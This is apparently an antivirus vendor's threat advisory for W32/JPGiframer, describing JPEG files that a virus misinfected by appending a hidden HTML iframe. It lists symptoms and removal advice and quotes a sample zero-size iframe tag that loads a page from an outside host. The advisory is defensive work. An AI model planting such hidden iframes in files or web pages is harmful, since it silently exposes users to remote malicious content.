Content

W32/JPGiframer

Type
Virus
SubType
Damaged
Discovery Date
07/28/2008
Length
Minimum DAT
5348 (07/28/2008)
Updated DAT
5348 (07/28/2008)
Minimum Engine
5.2.00
Description Added
07/28/2008
Description Modified
07/29/2008 11:57 PM (PT)
Risk Assessment
Corporate User
Low
Home User
Low

Tab Navigation

Characteristics

The Jpeg files detected are infected incorrectly by a virus. The misinfected Jpeg files, may continue to function as normal or may try to run the virus without any effect. In some cases the misinfected file may be entirely unusable, having been corrupted by the virus.

Such misinfected files, contain an appended HTML IFRAME (inline-frame) tag such as the one below:

  • iframe src=http://www.goldwindos2000.com/[Removed] width=0 height=0 /iframe

Symptoms

  • Increased size of Jpeg file
  • Presence of IFRAME tags appended to Jpeg files

Method of Infection

Misinfected files cannot spread from one machine to another, however, the virus that was responsible for the misinfection could.

Removal

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

Additional Windows ME/XP removal considerations

Variants

Variants

    N/A

All Information

Overview -

This detection is for misinfected Jpeg files, which contain an IFRAME tag added at the end of the file.

A misinfected file is one that a virus has attempted to infect, but has not done so in the way in which the virus writer intended.

Characteristics

Characteristics -

The Jpeg files detected are infected incorrectly by a virus. The misinfected Jpeg files, may continue to function as normal or may try to run the virus without any effect. In some cases the misinfected file may be entirely unusable, having been corrupted by the virus.

Such misinfected files, contain an appended HTML IFRAME (inline-frame) tag such as the one below:

  • iframe src=http://www.goldwindos2000.com/[Removed] width=0 height=0 /iframe

Symptoms

Symptoms -

  • Increased size of Jpeg file
  • Presence of IFRAME tags appended to Jpeg files

Method of Infection

Method of Infection -

Misinfected files cannot spread from one machine to another, however, the virus that was responsible for the misinfection could.

Removal -

Removal -

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

Additional Windows ME/XP removal considerations

Variants

Variants -

    N/A